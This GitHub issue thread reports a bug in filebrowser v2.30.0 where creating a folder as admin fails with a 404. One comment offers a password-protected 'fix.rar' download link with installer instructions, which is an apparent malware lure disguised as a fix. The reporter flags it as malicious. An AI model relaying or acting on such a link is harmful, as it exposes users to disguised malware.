### ISSUE TITLE
Folder issue /Admin action: new folder always fails

### ISSUE THREAD

**Issue by vman-dev** [filebrowser/filebrowser#3426]
**Description**

I start to create a new folder. Note I am Admin.
**Expected behaviour**

I have a new folder, where I could upload files and at least browse the new folder without errors.
**What is happening instead?**

Space can not be found! 404 error always
**Additional context**

![Screenshot 2024-08-26 at 18-22-34 Dateien - File Browser](https://github.com/user-attachments/assets/dbba787f-30a6-4d1f-8a1e-af38bd2adec5)

**How to reproduce?**

Going on Create a new folder
**Files**

I use v2.30.0 on a vps debian 10 server

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vman-dev** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

**Warning.** That seems to be malware or malicious code. If so ban user ghost, please. Thank You, but no helpful info so far.
